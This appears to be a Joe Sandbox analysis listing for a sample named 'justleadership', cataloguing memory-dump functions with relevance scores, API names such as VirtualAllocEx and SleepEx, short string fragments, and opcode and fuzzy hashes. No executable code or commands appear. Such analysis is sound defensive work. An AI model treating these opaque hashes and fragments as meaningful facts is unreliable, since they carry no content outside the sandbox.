                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2121702758.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1730000_justleadership.jbxd
                                              Similarity
                                              • API ID: CallbackDispatcherUser
                                              • String ID: i\w
                                              • API String ID: 2492992576-1682270839
                                              • Opcode ID: 76d919344cf82bccddfc00823834bc36c43d8c2712541058c412e49d213e4d8a
                                              • Instruction ID: 841476566374aefb8540e7c612dea7238363b83d0be42eef5a5494be618b9698
                                              • Opcode Fuzzy Hash: 76d919344cf82bccddfc00823834bc36c43d8c2712541058c412e49d213e4d8a
                                              • Instruction Fuzzy Hash: 3121EEB6804394CFCB21CF99D5043EEBFF4AF05324F14809AD988B7282C379A604CBA1
                                              Function 06D34080 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              • SleepEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,BF3B6406), ref: 06D340EF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: i\w
                                              • API String ID: 3472027048-1682270839
                                              • Opcode ID: f39cac4421a994356f6653098d0e3c7a667f4ba3f217879fa7605864922d4b18
                                              • Instruction ID: b608732dab7cde91cd2a032e16f2970b255f1ea9b322539a9d3731b6f1ceb6fe
                                              • Opcode Fuzzy Hash: f39cac4421a994356f6653098d0e3c7a667f4ba3f217879fa7605864922d4b18
                                              • Instruction Fuzzy Hash: DD1149B1D003598FDB10DFAAC4447EEFFF8AF48320F24842AD455A7250CA39A944CBA4
                                              Function 06D38180 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D381EE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163152545.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6d30000_justleadership.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: i\w
                                              • API String ID: 4275171209-1682270839
                                              • Opcode ID: 008974d0badff1cfd419a58f4980d1520f41fb5da6959c658468ff93f0514607
                                              • Instruction ID: 85f23d48c00cb471cb1136d38c75000c23a7b32191551e8d27542d9d220a2a4a
                                              • Opcode Fuzzy Hash: 008974d0badff1cfd419a58f4980d1520f41fb5da6959c658468ff93f0514607
                                              • Instruction Fuzzy Hash: EB113772900249DFCB10DFAAC944BDEBFF5EF48324F208819E555A7250C775A544DFA4
                                              Function 0173AB18 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0173AB7E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2121702758.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1730000_justleadership.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID: i\w
                                              • API String ID: 4139908857-1682270839
                                              • Opcode ID: 2f029166497f7a83634b46b58463d2d5a9d23fbdd8f29fe94f03cdb5086a7161
                                              • Instruction ID: df611f1f4fe6ae04c6c1d469318fe3f8a2c054671baa7d176e461980535d3de8
                                              • Opcode Fuzzy Hash: 2f029166497f7a83634b46b58463d2d5a9d23fbdd8f29fe94f03cdb5086a7161
                                              • Instruction Fuzzy Hash: 871110B5C003498FDB14CF9AC444BDEFBF9EB88324F10842AD458A7210C379A545CFA5
                                              Function 069B0D98 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2159729994.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_69b0000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'kq$4'kq
                                              • API String ID: 0-4171853269
                                              • Opcode ID: e40279f683060c54f603eb9835d1b247de67aa926755f996bad08766cf91152e
                                              • Instruction ID: ddc659f83f15b231038e752c5cb3c4964c5a231c864126de51fe34d7ac5d1a1e
                                              • Opcode Fuzzy Hash: e40279f683060c54f603eb9835d1b247de67aa926755f996bad08766cf91152e
                                              • Instruction Fuzzy Hash: C242D534E04209CFDB95DB98D698AEEBBB6FF49300F209419D912AB754D7349D82CF90
                                              Function 06B8E81B Relevance: 3.1, Strings: 2, Instructions: 553COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $kq$$kq
                                              • API String ID: 0-3550614674
                                              • Opcode ID: 197fce1403123a3d5717b6014418d87df1a5bcf24b4a4920c2124bf1eb3a0730
                                              • Instruction ID: de035f11ce25688cd7d54582ccee527693272ac0849a7883f0a6d8f722ac6f56
                                              • Opcode Fuzzy Hash: 197fce1403123a3d5717b6014418d87df1a5bcf24b4a4920c2124bf1eb3a0730
                                              • Instruction Fuzzy Hash: 50325EB0E002199FCB55EFA4D894AADBBB2FF48300F148595E911A7395DB38ED46CF90
                                              Function 06C0E500 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 52memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06C0E56B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2162463060.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c00000_justleadership.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: i\w
                                              • API String ID: 4275171209-1682270839
                                              • Opcode ID: 0812dfb96f9364d56133e8b55dc0691fb1261fe9def078dbc9366d67bf60ac54
                                              • Instruction ID: 24b19c403e992165d05000f51fc2ee6c629cc5cd664da730cbb4b75448c2beb6
                                              • Opcode Fuzzy Hash: 0812dfb96f9364d56133e8b55dc0691fb1261fe9def078dbc9366d67bf60ac54
                                              • Instruction Fuzzy Hash: AD1134B59002499FDB10DFAAC944BDEBBF9EB88320F20881AD459A7250C775A544CFA4
                                              Function 06E8EB30 Relevance: 2.9, Strings: 2, Instructions: 359COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2163272059.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e70000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (oq$d
                                              • API String ID: 0-886291620
                                              • Opcode ID: 7fe371541bb23a28638039c799882f7eae81dc0362cb483fd47da319eba6e026
                                              • Instruction ID: 0c8f019453427b0186c3f45349b03df32574e0d781952c85bfd4977a103603f2
                                              • Opcode Fuzzy Hash: 7fe371541bb23a28638039c799882f7eae81dc0362cb483fd47da319eba6e026
                                              • Instruction Fuzzy Hash: AAD17E346007168FCB14DF28C58096ABBF6FF89314B158969E85E9B3A5DB30FC46CB90
                                              Function 069B2490 Relevance: 2.8, Strings: 2, Instructions: 279COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2159729994.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_69b0000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'kq$4'kq
                                              • API String ID: 0-4171853269
                                              • Opcode ID: 3c367cd6d6d3926a4e9e9da48b2b6242b6d4f79d535b27b83b55e3af15f4cf18
                                              • Instruction ID: 8a8f7d776e54fb2b8fc3f5afcc4475fbceb26c043e3b9a09bb90f54243c4a6d0
                                              • Opcode Fuzzy Hash: 3c367cd6d6d3926a4e9e9da48b2b6242b6d4f79d535b27b83b55e3af15f4cf18
                                              • Instruction Fuzzy Hash: E8C1E274E00209CFDB45EFA5D5986FEBBB6FB48301F20942AD412AB654C7795E42CF90
                                              Function 069B1598 Relevance: 2.7, Strings: 2, Instructions: 231COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2159729994.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_69b0000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'kq$4'kq
                                              • API String ID: 0-4171853269
                                              • Opcode ID: 85dd7275ce7dd8672cc965b5e2a1b9d2e72660008b0bc459681c7d0cb9174010
                                              • Instruction ID: b32eea830d47bde8f08a091df99e2485f64c13d04cbfab6eb8d05e9748b72efb
                                              • Opcode Fuzzy Hash: 85dd7275ce7dd8672cc965b5e2a1b9d2e72660008b0bc459681c7d0cb9174010
                                              • Instruction Fuzzy Hash: BEA1DF74E00209CFDB58DFA9D5986EDBBB6BF49301F20942AD902A7794CB745D82CF90
                                              Function 06B8DE58 Relevance: 2.7, Strings: 2, Instructions: 161COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (oq$Hoq
                                              • API String ID: 0-3084834809
                                              • Opcode ID: 1a50df8a61acdc2e5c2d5b6a55c644597fd77e0f9c7defd3f43f91a392622b90
                                              • Instruction ID: d1cbb93903334247ab092939f1f0692fc2256dde31dda86933f992f9bc1f216b
                                              • Opcode Fuzzy Hash: 1a50df8a61acdc2e5c2d5b6a55c644597fd77e0f9c7defd3f43f91a392622b90
                                              • Instruction Fuzzy Hash: D3514530B006158FC759FF29C85492EBBA7FF9934072185ADD9069B3A5CE35EC06CB91
                                              Function 06B8A590 Relevance: 2.6, Strings: 2, Instructions: 143COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (oq$Hoq
                                              • API String ID: 0-3084834809
                                              • Opcode ID: a1a4e38c9631693179cfbe50e9af3b6adb6fff403eccb341fe948a02e3f58408
                                              • Instruction ID: e5e8aee36017b01488e0e1877a54242926a462e6a46dae82e594843e18409c80
                                              • Opcode Fuzzy Hash: a1a4e38c9631693179cfbe50e9af3b6adb6fff403eccb341fe948a02e3f58408
                                              • Instruction Fuzzy Hash: C251CE706047418FD361EF3DC45065BBBE2EF80310F158A6ED5568B7A6DA34D845CBA1
                                              Function 06B62398 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161536871.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b60000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ,oq
                                              • API String ID: 0-651702701
                                              • Opcode ID: 564a2ca90748c75d079b9261bd2241789984c86672720b7b1018d0717707725e
                                              • Instruction ID: e71903e5c6bff512ea8245c049d10d2c3d79552c10292ab0524036c753ae1aea
                                              • Opcode Fuzzy Hash: 564a2ca90748c75d079b9261bd2241789984c86672720b7b1018d0717707725e
                                              • Instruction Fuzzy Hash: 4952F9B5A002288FDB64DF69C950BADBBF6FF88300F1541D9E509A7391DA349E81CF61
                                              Function 06B8F400 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (_kq
                                              • API String ID: 0-2183774854
                                              • Opcode ID: 0e1d99a133ca29c592c87845ef9c44f536a6503008ddb2755854b1cba5304a1d
                                              • Instruction ID: 7ab12c27e66ccc8aeff811e786e7efd936fddcceb8314783329a901942a7a837
                                              • Opcode Fuzzy Hash: 0e1d99a133ca29c592c87845ef9c44f536a6503008ddb2755854b1cba5304a1d
                                              • Instruction Fuzzy Hash: 82229CB5B00205DFDB54EF68D490A6DB7B6FF88350F1481A9E906AB3A1CB35EC41CB90
                                              Function 06B8FC05 Relevance: 1.7, Strings: 1, Instructions: 402COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Plkq
                                              • API String ID: 0-177148220
                                              • Opcode ID: c1c7692c45d11715c8b384b2e9187687b584921dcee5494e58f16ddbc2f48b43
                                              • Instruction ID: 72b95b418aa62e7c6e4733396fcd6e9ab926975e0c572f3ff6deea9d39773551
                                              • Opcode Fuzzy Hash: c1c7692c45d11715c8b384b2e9187687b584921dcee5494e58f16ddbc2f48b43
                                              • Instruction Fuzzy Hash: 1251E274B401098FDB44EF28C584A6A7BFAEF89740F2580A5E505DB3B5DB75DC42CB90
                                              Function 06B614A9 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161536871.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b60000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'kq
                                              • API String ID: 0-3255046985
                                              • Opcode ID: 938dc6ef5b4011d262444ecfcd90477649d9b43324de2e60e33b8222a57aed9e
                                              • Instruction ID: 3bffa4ffd23775e41a1e437d814d5ceaf690df359b8488505ca8cc3a5331e546
                                              • Opcode Fuzzy Hash: 938dc6ef5b4011d262444ecfcd90477649d9b43324de2e60e33b8222a57aed9e
                                              • Instruction Fuzzy Hash: E2A13C74A10218DFCB44EFA9D894D9DB7B2FF89301F158199E906AB364DB74EC42CB50
                                              Function 06B8AB48 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (oq
                                              • API String ID: 0-3175707579
                                              • Opcode ID: 0a64aa94ff0c29d1220e53d0d72f0ed5dd01de01111e0c6e9705905093df0a64
                                              • Instruction ID: 836c85873c986748c048193f9927a52849ef20cd96c6cc9ef8cf4945e1bd1a71
                                              • Opcode Fuzzy Hash: 0a64aa94ff0c29d1220e53d0d72f0ed5dd01de01111e0c6e9705905093df0a64
                                              • Instruction Fuzzy Hash: D5510575A016158FCB11DF68D88096AFBB5FF85320F16829AE5159B352D730FC91CBD0
                                              Function 06B89B90 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: poq
                                              • API String ID: 0-1570044193
                                              • Opcode ID: 522607376fce4c84eb2ea35a6ed53a0f31fa2dbc3840515827616741d2be722b
                                              • Instruction ID: 9731e7200fecdb11da60bb13bac42218410fb5fbac1ba283c489f49ec99fffb1
                                              • Opcode Fuzzy Hash: 522607376fce4c84eb2ea35a6ed53a0f31fa2dbc3840515827616741d2be722b
                                              • Instruction Fuzzy Hash: 01513076640104AFCB459FA8C904D6A7FB7FF8D31471580D8E6099B372DA36DC22DB51
                                              Function 06B661B8 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161536871.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b60000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (oq
                                              • API String ID: 0-3175707579
                                              • Opcode ID: 25e9205dff5e9857a48deff01a9f26c9eb7b2b6978c1609ba9dd6370c402d803
                                              • Instruction ID: 5f9ad49fe8c916b795f62eff47ffc6159306e08e2165f316a630900adee76e42
                                              • Opcode Fuzzy Hash: 25e9205dff5e9857a48deff01a9f26c9eb7b2b6978c1609ba9dd6370c402d803
                                              • Instruction Fuzzy Hash: CF519E32B04214AFCB059FA9D814D5ABBB6FF89320B1680E6E605DF372DA35DC11DB91
                                              Function 06B65159 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161536871.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b60000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'kq
                                              • API String ID: 0-3255046985
                                              • Opcode ID: 13bfff3af991925b520235da1f885005eb6edc725b1365efd48640b9d08fd101
                                              • Instruction ID: cb3e17fc3e32ccf9ea8ea23d8aa50fc31e49aae4bc619681d6104b1b2187e82f
                                              • Opcode Fuzzy Hash: 13bfff3af991925b520235da1f885005eb6edc725b1365efd48640b9d08fd101
                                              • Instruction Fuzzy Hash: C5418270B106188FCB94FB79C85496EB7B7AFC9600F144569E413AB394CF789C46CB91
                                              Function 06A48570 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2159882193.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a40000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: TJpq
                                              • API String ID: 0-270235555
                                              • Opcode ID: 7a4f9779738362483d3626349b9eaf2a043f2164a3580984cea00504fd0bdabf
                                              • Instruction ID: 29a56fc8f9ea868bc700014cb5340ebf3b693b925563d5b1c549020da88ef2a1
                                              • Opcode Fuzzy Hash: 7a4f9779738362483d3626349b9eaf2a043f2164a3580984cea00504fd0bdabf
                                              • Instruction Fuzzy Hash: AE51C874E04208DFDB44EFA9E848A9DBBF2FF89311F148069E516A7350EB349945CF51
                                              Function 06A48580 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2159882193.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6a40000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: TJpq
                                              • API String ID: 0-270235555
                                              • Opcode ID: fc2343fdba50de5907066fa58f189d55fcc4b78d0df473fb59b14c7f710ca55d
                                              • Instruction ID: e6b67ef46145fbd9461068d5cfeb956fdb9dd6dacaf86e70133bf99551fc9702
                                              • Opcode Fuzzy Hash: fc2343fdba50de5907066fa58f189d55fcc4b78d0df473fb59b14c7f710ca55d
                                              • Instruction Fuzzy Hash: CC51C874E04208DFDB44EFA9E884A9DBBF2FF89301F10806AE516A7350EB349945CF51
                                              Function 06B64B60 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161536871.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b60000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'kq
                                              • API String ID: 0-3255046985
                                              • Opcode ID: 3487fc6727c20c4522e286a0a5fb0b06aad4f1615a03e7748d6a8bc59cf517ef
                                              • Instruction ID: e6addd9117dde6617cb8f2b843bdb2edfac8d620f96debf3764828e77ef2a8a3
                                              • Opcode Fuzzy Hash: 3487fc6727c20c4522e286a0a5fb0b06aad4f1615a03e7748d6a8bc59cf517ef
                                              • Instruction Fuzzy Hash: 90319F717406149FD358EB29D954F2B77E6EFC8710F1044A8E6068B3A5CE76EC42C790
                                              Function 06B64B70 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161536871.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b60000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'kq
                                              • API String ID: 0-3255046985
                                              • Opcode ID: 4b5247e99707707f32cb8a4741659a0348f8e64f9e4f1f43795aa9ed841c41af
                                              • Instruction ID: 877b1748fd6ba75c2af1383fec3b71f236d8e5e68347b93c47be3baab35bd83f
                                              • Opcode Fuzzy Hash: 4b5247e99707707f32cb8a4741659a0348f8e64f9e4f1f43795aa9ed841c41af
                                              • Instruction Fuzzy Hash: 8B318D713406149FD348EB29D954F2B77E6EFC8710F104468E6068B3A5CE7AEC42C790
                                              Function 06B8A438 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (oq
                                              • API String ID: 0-3175707579
                                              • Opcode ID: 5f6ef71b8c993d70488b1478ba30123e84abf5fa5bb36f67c2c81098bcdc983c
                                              • Instruction ID: 9d70de34cc1804a2e3bdddb0d846ed8b323982a490f4141940bf709dbe130af2
                                              • Opcode Fuzzy Hash: 5f6ef71b8c993d70488b1478ba30123e84abf5fa5bb36f67c2c81098bcdc983c
                                              • Instruction Fuzzy Hash: 653122367002556FDB05AE69D8509AFBFAAEFC9360B15807AFA05CB365CE318C05C7A0
                                              Function 06B60920 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161536871.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b60000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'kq
                                              • API String ID: 0-3255046985
                                              • Opcode ID: 293dedfa33e569f5530973a97b371c556f72568f437004be27d8d6cbc8d2fa93
                                              • Instruction ID: ff402c934c8222f0295f39e4aa7c957d3d97315dac0a50a6e141976d4311adf9
                                              • Opcode Fuzzy Hash: 293dedfa33e569f5530973a97b371c556f72568f437004be27d8d6cbc8d2fa93
                                              • Instruction Fuzzy Hash: 7E31C336B002089FCF15EF95C95499A7BB2FF8C311B1540A9EA06AB361CA31DC53CBA1
                                              Function 069B2470 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2159729994.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_69b0000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'kq
                                              • API String ID: 0-3255046985
                                              • Opcode ID: eb5099cb1d3bb360127106b26f6da5c0713f710c46acc16abcbc4048c83c8b62
                                              • Instruction ID: 5af2d79e6e4f3f593ea81476734bce8a39ec91fa5a1224ff8329a27c60e15362
                                              • Opcode Fuzzy Hash: eb5099cb1d3bb360127106b26f6da5c0713f710c46acc16abcbc4048c83c8b62
                                              • Instruction Fuzzy Hash: 0C313670E04349CFDB49DFAAC9146EEBBB2EF86300F14906AD015AB690D7381E41CF95
                                              Function 06B8E74F Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: p<kq
                                              • API String ID: 0-3321991346
                                              • Opcode ID: d48f49750ae923c08f9c593973f3489a9e8336171699fccf03e57e7112a2e4c6
                                              • Instruction ID: 1646749600a059706b1233fa41ed5f9c4d02c23d3eeb4982fa847d7024a35f23
                                              • Opcode Fuzzy Hash: d48f49750ae923c08f9c593973f3489a9e8336171699fccf03e57e7112a2e4c6
                                              • Instruction Fuzzy Hash: 87213A753042589FDB56EE2AC844DAA7BEAFF8A210B154096F805CB272DA35DC52CB60
                                              Function 069B0D7C Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2159729994.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_69b0000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'kq
                                              • API String ID: 0-3255046985
                                              • Opcode ID: 565e28527554bdcc3b932d91baa00c71bd12eee2edc6e485cb1255c5f6865139
                                              • Instruction ID: b98f0da6b0ef4e2b9b6760e2ac89c350629128b1f4a118fdeda655186fabed27
                                              • Opcode Fuzzy Hash: 565e28527554bdcc3b932d91baa00c71bd12eee2edc6e485cb1255c5f6865139
                                              • Instruction Fuzzy Hash: 8531A930D09349CFDB55CFA8D9146EEBBB2AF85300F1090AAE012A7691CB385E45CFA1
                                              Function 06B8E760 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: p<kq
                                              • API String ID: 0-3321991346
                                              • Opcode ID: 81307aaab47f7f3a2b2984eb87eb16869ea9cf79562139604ea76c09bcabe08d
                                              • Instruction ID: 2eed61be40c7a4b000855f4f15958cba3001ee0f0f0b09956d3fe47db8944a40
                                              • Opcode Fuzzy Hash: 81307aaab47f7f3a2b2984eb87eb16869ea9cf79562139604ea76c09bcabe08d
                                              • Instruction Fuzzy Hash: F7215E747001989FCB51EF2AC844EAA7BEAEF89210B154095FC55CB3B1DA35EC52CB60
                                              Function 06B87186 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2161621561.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6b80000_justleadership.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Tekq
                                              • API String ID: 0-2319236580
                                              • Opcode ID: adf3255f9df87ce33bb9fc3d6897285892d6e164bd074f207b61cd7eec0d551b
                                              • Instruction ID: a8606217d71f881e047aef7bfbd8134408c588a0eafda42b0176dffe77f724b7
                                              • Opcode Fuzzy Hash: adf3255f9df87ce33bb9fc3d6897285892d6e164bd074f207b61cd7eec0d551b
                                              • Instruction Fuzzy Hash: FC21D8B0E011598FDB64EF69D994BADBBB2BB48304F2094AAD50EA3250DE345D84DF00
